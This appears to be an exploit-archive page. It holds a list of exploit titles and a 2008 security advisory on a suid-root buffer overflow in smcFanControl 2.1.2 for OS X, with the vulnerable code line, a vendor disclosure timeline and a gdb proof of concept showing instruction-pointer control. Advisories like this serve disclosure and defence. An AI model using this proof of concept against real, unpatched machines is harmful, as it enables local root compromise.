477bcbdcc0
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
174 lines
4.5 KiB
Text
Executable file
174 lines
4.5 KiB
Text
Executable file
vnsecurity.net ADVISORY 2008-11
|
|
===============================
|
|
|
|
:Title: Buffer overflows in smcFanControl 2.1.2 for OSX
|
|
:Severity: Critical
|
|
:Reporter: KaiJern, Lau ( kjlau at vnsecurity.net)
|
|
:Products: smcFanControl 2.1.2
|
|
:OS: OSX
|
|
:Fixed in: to be release smcFanControl 2.1.3
|
|
|
|
|
|
About smcFanControl
|
|
--------------------
|
|
|
|
First of all, this is a very wonderul software and most of the macbook install
|
|
with this software. A big credit for the author Hendrik Holtmann.
|
|
|
|
Quote from the Official WebSite :
|
|
|
|
smcFanControl lets the user set the minimum speed of the build in fans.
|
|
So you can increase your minimum fan speed to make your intel mac run cooler.
|
|
|
|
However in order not to damage your machine scFanControl let's you not
|
|
set minimum
|
|
speed to a rate under Apple's defaults. In addition to that fans are
|
|
still in automatic
|
|
mode, so the speed of your fans will increase, if CPU load gets higher.
|
|
|
|
|
|
Description
|
|
-----------
|
|
|
|
First of all, let us look at
|
|
/Applications/smcFanControl.app/Contents/Resources/smc
|
|
|
|
Input option of smc -k was not able to handle large buffer. This will
|
|
end up with a buffer overflow bug.
|
|
|
|
Code from smc.c
|
|
|
|
-- snip snip --
|
|
|
|
int main(int argc, char *argv[])
|
|
{
|
|
int c;
|
|
extern char *optarg;
|
|
extern int optind, optopt, opterr;
|
|
|
|
kern_return_t result;
|
|
int op = OP_NONE;
|
|
UInt32Char_t key = "\0";
|
|
SMCVal_t val;
|
|
|
|
while ((c = getopt(argc, argv, "fhk:lrw:v")) != -1)
|
|
{
|
|
switch(c)
|
|
{
|
|
case 'f':
|
|
op = OP_READ_FAN;
|
|
break;
|
|
case 'k':
|
|
sprintf(key, optarg); // Overflow !!!
|
|
break;
|
|
|
|
-- snip snip --
|
|
|
|
$ ls -alF /Applications/smcFanControl.app/Contents/Resources/smc
|
|
-r-sr-sr-x 1 root admin 18212 Jun 13 2007
|
|
/Applications/smcFanControl.app/Contents/Resources/smc*
|
|
|
|
With default installation, smc binary is always install with suid
|
|
root. There is a possibility
|
|
for a local user to gain root privilege.
|
|
|
|
It has not been verified if other version (version 1.x maybe) are also
|
|
vulnerable.
|
|
|
|
Workaround
|
|
----------
|
|
|
|
Upgrade to latest version.
|
|
|
|
Fix
|
|
---
|
|
|
|
Hendrik Holtmann releasing smcFanControl 2.1.3.
|
|
|
|
Disclosure
|
|
----------
|
|
|
|
vnsecurity.net adapts `RFPolicy v2.0
|
|
<http://www.wiretrip.net/rfp/policy.html>`_ in notifying vendors.
|
|
|
|
:Initial vendor contact:
|
|
|
|
Nov 10th, 2008: Initial contact sent to holtmann@mac.com, while we
|
|
are having coffee.
|
|
|
|
:Vendor response:
|
|
|
|
Nov 10th, 2008: Hendrik Holtmann response as soon as we finish our coffee.
|
|
|
|
:Further communication:
|
|
|
|
Nov 10th, 2008: Technical summary sent to Hendrik Holtmann.
|
|
Nov 11th, 2008: Hendrik Holtmann responded with version upgrade. Fixed.
|
|
|
|
|
|
|
|
:Public disclosure: 12th Nov 2008
|
|
|
|
|
|
:PoC code:
|
|
|
|
Exploit for the first overflow written by KaiJern, Lau
|
|
|
|
::
|
|
|
|
$ gdb -q /Applications/smcFanControl.app/Contents/Resources/smc
|
|
Reading symbols for shared libraries ... done
|
|
(gdb) r -k `ruby -e 'print "A" * 45'`BBBBCCCC
|
|
Starting program:
|
|
/Applications/smcFanControl.app/Contents/Resources/smc -k `ruby -e
|
|
'print "A" * 45'`BBBBCCCC
|
|
Reading symbols for shared libraries ++........ done
|
|
|
|
Program received signal EXC_BAD_ACCESS, Could not access memory.
|
|
Reason: KERN_INVALID_ADDRESS at address: 0x43434343
|
|
0x43434343 in ?? ()
|
|
(gdb) i r
|
|
eax 0x0 0
|
|
ecx 0xbfffeb8c -1073747060
|
|
edx 0x94bf94a6 -1799383898
|
|
ebx 0x41414141 1094795585
|
|
esp 0xbfffed60 0xbfffed60
|
|
ebp 0x42424242 0x42424242
|
|
esi 0x41414141 1094795585
|
|
edi 0x41414141 1094795585
|
|
eip 0x43434343 0x43434343
|
|
eflags 0x10282 66178
|
|
cs 0x17 23
|
|
ss 0x1f 31
|
|
ds 0x1f 31
|
|
es 0x1f 31
|
|
fs 0x0 0
|
|
gs 0x37 55
|
|
|
|
::
|
|
|
|
Blog :
|
|
------
|
|
|
|
- http://blog.xwings.net
|
|
|
|
|
|
Special Thanks to
|
|
-----------------
|
|
|
|
- Hack In The Box, http://www.hitb.org
|
|
- beist.org
|
|
- Blue Moon Consulting Co., Ltd, http://www.bluemoon.com.vn
|
|
|
|
Disclaimer
|
|
----------
|
|
|
|
The information provided in this advisory is provided "as is" without
|
|
warranty of any kind. vnsecurity.net disclaims all warranties,
|
|
either express or implied, including the warranties of merchantability
|
|
and fitness for a particular purpose.
|
|
Your use of the information on the advisory or materials linked from
|
|
the advisory is at your own risk.
|
|
vnsecurity.net reserves the right to change or update this notice at any time.
|
|
|
|
# milw0rm.com [2008-11-11]
|